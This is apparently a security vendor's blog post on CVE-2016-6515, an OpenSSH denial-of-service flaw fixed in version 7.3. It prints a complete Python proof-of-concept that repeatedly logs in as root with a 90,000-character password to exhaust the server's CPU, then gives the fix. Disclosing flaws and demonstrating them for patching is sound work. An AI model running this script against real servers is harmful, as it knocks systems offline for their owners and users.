Untitled-3OpenSSH is a free suite of connectivity tool aka OpenBSD Secure Shell, which provides secure encryption for both remote login and file transfer between two hosts over a network.

CVE-2016-6515 (Denial of Service Vulnerability)

It has been discovered that OpenSSH server incorrectly handles password hashing while authenticating non-existing users. In OpenSSH versions prior to 7.3, the ‘auth_password’ function in ‘auth_passwd.c’ script, used in sshd, does not limit length of password. This allows remote attackers to cause a denial of service against the system’s crypt function via sshd.


How does it actually work? Here is the Proof of Concept:

If the remote machine is installed and running OpenSSH version prior to 7.3, it does not limit the password length for authentication. Hence, to exploit this vulnerability, we will send a crafted data which is of 90000 characters in length to the ‘password’ field while attempting to log in to a remote machine via ssh with username as ‘root’.

PoC Code:

#######################################################################
# Open SSH DoS Vulnerability PoC Code
#
# Author:
# Kashinath T
#
# Date: 2016/08/25
#######################################################################

import paramiko
import sys
from random import choice
from string import lowercase

class ssh_exploit:

    def __init__(self):
        """
        Initialise the objects
        """

    def ssh_login(self, remote_ip):
	
        try:
	    ##Crafted password of length 90000
	    passwd_len = 90000
            crafted_passwd = "".join(choice(lowercase) for i in range(passwd_len))

            ##Connect to a remote machine via ssh
	    ssh = paramiko.SSHClient()
	    ssh.load_system_host_keys()
	    ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())

	    ##calling connect in infinite loop
	    print "[+] Entering infinite loop"
	    while 1:
                ssh.connect(remote_ip, username='root', password=crafted_passwd)
              
	except Exception, msg:
            print "Error in connecting to remote host : ", remote_ip
       	    print "Exception in : ssh_login method."
            sys.exit(msg)

def main():

    if len(sys.argv) != 2:
        print "\n\nEnter Ip of a remote machine\n\n"
        print "usage: python ssh.py 192.168.x.x"
        sys.exit();
        
    ##Calling ssh_connect 
    ref_obj = ssh_exploit()
    ref_obj.ssh_login(sys.argv[1])

if __name__ == "__main__":
    main()

The result of exploiting the OpenSSH DoS vulnerability can be seen in the below screenshot.

SSHCPU

The remote attacker can perform a timely attack to exploit this issue, cause the application to enter into an infinite loop and consume excessive CPU resources (as seen in the above snapshot where CPU usage is 100% by sshd). The impact of this exploit results in a total shutdown of the affected resource, also the attacker can render the resource completely unavailable.

Affected Versions:  OpenSSH Version Prior to 7.3.

Fix: The issue can be resolved by updating the package OpenSSH to version 7.3.

SecPod Saner detects these vulnerabilities and automatically fixes it by applying security updates. Download Saner now and keep your systems updated and secure.

Share on FacebookShare on Google+Tweet about this on TwitterShare on LinkedIn
Loading Facebook Comments ...

Leave a Reply

Your email address will not be published. Required fields are marked *

You may use these HTML tags and attributes:

<a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <s> <strike> <strong>